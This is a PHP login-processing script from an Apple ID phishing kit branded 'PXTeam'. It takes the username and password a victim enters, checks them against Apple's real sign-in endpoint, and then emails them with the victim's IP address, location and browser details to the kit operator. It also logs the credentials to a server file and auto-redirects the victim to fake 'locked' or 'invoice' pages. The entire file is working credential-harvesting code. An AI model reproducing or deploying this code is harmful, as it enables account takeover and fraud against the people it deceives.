ProccessLogin

1. <?php
2. /*
3. Created by Kontol
4. */
5. require "session_protect.php";
6. require "functions.php";
7. require_once dirname(__FILE__)."/../../setting.php";
8. $domain = "https://$_SERVER[SERVER_NAME]";
9. if($t_login == "yes"){
10. $_SESSION['user'] = $_POST['user'];
11. $_SESSION['pass'] = $_POST['pass'];
12. $uZer = $_POST['user'];
13. $paZZ = $_POST['pass'];
14. if(isset($_POST["user"]) AND isset($_POST["pass"])){
15.    
16.     $ch = curl_init();
17.  
18. curl_setopt($ch, CURLOPT_URL, "https://idmsa.apple.com/appleauth/auth/signin");
19. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
20. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
21. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
22. curl_setopt($ch, CURLOPT_FOLLOWLOCATION,true);
23. curl_setopt($ch, CURLOPT_POSTFIELDS, '{"accountName":"'.$_POST['user'].'","password":"'.$_POST['pass'].'","rememberMe":false}');
24. curl_setopt($ch, CURLOPT_POST, 1);
25. curl_setopt($ch, CURLOPT_ENCODING, 'gzip, deflate');
26.  
27. $headers = array();
28. $headers[] = "Host: idmsa.apple.com";
29. $headers[] = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0";
30. $headers[] = "Accept: application/json, text/javascript, */*; q=0.01";
31. $headers[] = "Accept-Language: en-US,en;q=0.5";
32. $headers[] = "Referer: https://idmsa.apple.com/appleauth/auth/signin?widgetKey=65cf91973b413a70631c3e4d2e682494&language=en_US";
33. $headers[] = "Content-Type: application/json";
34. $headers[] = "X-Apple-Widget-Key: 65cf91973b413a70631c3e4d2e682494";
35. $headers[] = "X-Apple-I-Fd-Client-Info: {\"U\"\":\"\"Mozilla/5.0";
36. $headers[] = "X-Apple-Locale: en_US";
37. $headers[] = "X-Requested-With: XMLHttpRequest";
38. $headers[] = "Cookie: s_vi=[CS]v1|2CFF4972850311C2-60001183E000606C[CE]; as_dc=nwk; dssf=1; dssid2=46bdfe05-af3f-458f-a75e-b8da0c162378; as_pcts=nShAgwM4YjAw7vS8Y1J-t_aOuLFaaW3+-u05pWi+1CCWikia90im6ctTZc6U4Ua; as_sfa=Mnx1c3x1c3x8ZW5fVVN8Y29uc3VtZXJ8aW50ZXJuZXR8MHwwfDE=; optimizelyEndUserId=oeu1514952128951r0.5497066321506434; optimizelySegments=%\"7B\"%\"22341793217\"%\"22\"%\"3A\"%\"22search\"%\"22\"%\"2C\"%\"22341794206\"%\"22\"%\"3A\"%\"22false\"%\"22\"%\"2C\"%\"22341824156\"%\"22\"%\"3A\"%\"22ff\"%\"22\"%\"2C\"%\"22341932127\"%\"22\"%\"3A\"%\"22none\"%\"22\"%\"7D;";
39. $headers[] = "Connection: keep-alive";
40. $headers[] = "Pragma: no-cache";
41. $headers[] = "Cache-Control: no-cache";
42. curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
43.  
44. $result = curl_exec($ch);
45. if (curl_errno($ch)) {
46.     echo 'Error:' . curl_error($ch);
47. }
48. curl_close ($ch);
49. $cek = json_decode($result);
50. $true = $cek->authType;
51. if ($true == "sa" or $true == "hsa" or $true == "hsa2") {
52. if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
53.     $ip = $_SERVER['HTTP_CLIENT_IP'];
54. } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
55.     $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
56. } else {
57.     $ip = $_SERVER['REMOTE_ADDR'];
58. }
59.  
60. $systemInfo = systemInfo($ip);
61. $VictimInfo1 = "| IP Address :"." ".$ip." (".gethostbyaddr($ip).")";
62. $VictimInfo2 = "| Location :"." ".$systemInfo['city'].", ".$systemInfo['region'].", ".$systemInfo['country'];
63. $VictimInfo3 = "| UserAgent :"." ".$systemInfo['useragent'];
64. $VictimInfo4 = "| Browser :"." ".$systemInfo['browser'];
65. $VictimInfo5 = "| Platform :"." ".$systemInfo['os'];
66. $VictimInfo6 = "".$systemInfo['country'];
67. $from = $SenderEmail;
68. $headers = "From: $SenderLogin <$SenderEmail>";
69. $subj = "Login Apple [".$systemInfo['country']." $ip]";
70. $to = $Your_Email;
71. $warnsubj = "Abuse";
72. $data = "
73. ----------------------💜 PXTeam Project 💜----------------------
74.  
75.                    Username : $uZer
76.                    Password : $paZZ
77.  
78. --------------------------- PXTeam -----------------------------
79.  
80. From     :  $VictimInfo1 - $VictimInfo2
81. Browser  :  $VictimInfo3 - $VictimInfo4 - $VictimInfo5
82.  
83. --------------------------- PXTeam -----------------------------";
84. mail($to,$subj,$data,$headers);
85. $empas   = "$uZer | $paZZ [ ".$systemInfo['country']." ]\n";
86. $file = $_SERVER['DOCUMENT_ROOT']."/assets/logs/hmp.log";
87.  $isi1  = @file_get_contents($file);
88.    $buka1 = fopen($file,"a");
89.     fwrite($buka1, $empas);
90.     fclose($buka1);
91.    
92.     $file2 = $_SERVER['DOCUMENT_ROOT']."/assets/logs/._login_.txt";
93.     $isi  = @file_get_contents($file2);
94.     $buka = fopen($file2,"w");
95.     fwrite($buka, $isi+1);
96.     fclose($buka);
97. ?>
98. <?php if($typelogin == "locked"){
99.     ?>
100. <form action='../locked.php?<?php echo $_SESSION['user'];?>&Account-Unlock&sessionid=<?php echo generateRandomString(115); ?>&securessl=true' method='post' name='frm'>
101. <input type="hidden" name="user" value="<?php echo $_SESSION['user'];?>">
102. <input type="hidden" name="pass" value="<?php echo $_SESSION['pass'];?>">
103. </form>
104. <script language="JavaScript">
105. document.frm.submit();
106. </script>
107. }?>
108. <?php }else{
109. ?>
110. <form action='../invoice.php?<?php echo $_SESSION['user'];?>&Account-Unlock&sessionid=<?php echo generateRandomString(115); ?>&securessl=true' method='post' name='frm'>
111. <input type="hidden" name="user" value="<?php echo $_SESSION['user'];?>">
112. <input type="hidden" name="pass" value="<?php echo $_SESSION['pass'];?>">
113. </form>
114. <script language="JavaScript">
115. document.frm.submit();
116. </script>
117. <?php }}else{
118.  
119.     ?>
120.     <iframe width="100%" height="100%" name="login" id="login" src="<?php echo "$domain/assets/signin.php";?>" frameborder="0" scrolling="no"></iframe>
121.     <?php
122. }
123. }
124. }else{
125.     $_SESSION['user'] = $_POST['user'];
126. $_SESSION['pass'] = $_POST['pass'];
127. $uZer = $_POST['user'];
128. $paZZ = $_POST['pass'];
129. if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
130.     $ip = $_SERVER['HTTP_CLIENT_IP'];
131. } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
132.     $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
133. } else {
134.     $ip = $_SERVER['REMOTE_ADDR'];
135. }
136.  
137. $systemInfo = systemInfo($ip);
138. $VictimInfo1 = "| IP Address :"." ".$ip." (".gethostbyaddr($ip).")";
139. $VictimInfo2 = "| Location :"." ".$systemInfo['city'].", ".$systemInfo['region'].", ".$systemInfo['country'];
140. $VictimInfo3 = "| UserAgent :"." ".$systemInfo['useragent'];
141. $VictimInfo4 = "| Browser :"." ".$systemInfo['browser'];
142. $VictimInfo5 = "| Platform :"." ".$systemInfo['os'];
143. $VictimInfo6 = "".$systemInfo['country'];
144. $from = $SenderEmail;
145. $headers = "From: $SenderLogin <$SenderEmail>";
146. $subj = "Login Apple [".$systemInfo['country']." $ip]";
147. $to = $Your_Email;
148. $warnsubj = "Abuse";
149. $data = "
150. ----------------------💜 PXTeam Project 💜----------------------
151.  
152.                    Username : $uZer
153.                    Password : $paZZ
154.  
155. --------------------------- PXTeam -----------------------------
156.  
157. From     :  $VictimInfo1 - $VictimInfo2
158. Browser  :  $VictimInfo3 - $VictimInfo4 - $VictimInfo5
159.  
160. --------------------------- PXTeam -----------------------------";
161. mail($to,$subj,$data,$headers);
162. $empas   = "$uZer | $paZZ [ ".$systemInfo['country']." ]\n";
163. $file = $_SERVER['DOCUMENT_ROOT']."/assets/logs/hmp.log";
164.  $isi1  = @file_get_contents($file);
165.    $buka1 = fopen($file,"a");
166.     fwrite($buka1, $empas);
167.     fclose($buka1);
168.    
169.     $file2 = $_SERVER['DOCUMENT_ROOT']."/assets/logs/._login_.txt";
170.     $isi  = @file_get_contents($file2);
171.     $buka = fopen($file2,"w");
172.     fwrite($buka, $isi+1);
173.     fclose($buka);
174.     ?>
175. <?php if($typelogin == "locked"){
176.     ?>
177. <form action='../locked.php?<?php echo $_SESSION['user'];?>&Account-Unlock&sessionid=<?php echo generateRandomString(115); ?>&securessl=true' method='post' name='frm'>
178. <input type="hidden" name="user" value="<?php echo $_SESSION['user'];?>">
179. <input type="hidden" name="pass" value="<?php echo $_SESSION['pass'];?>">
180. </form>
181. <script language="JavaScript">
182. document.frm.submit();
183. </script>
184. }?>
185. <?php }else{
186. ?>
187. <form action='../invoice.php?<?php echo $_SESSION['user'];?>&Account-Unlock&sessionid=<?php echo generateRandomString(115); ?>&securessl=true' method='post' name='frm'>
188. <input type="hidden" name="user" value="<?php echo $_SESSION['user'];?>">
189. <input type="hidden" name="pass" value="<?php echo $_SESSION['pass'];?>">
190. </form>
191. <script language="JavaScript">
192. document.frm.submit();
193. </script>
194. <?php
195. }}
196. ?>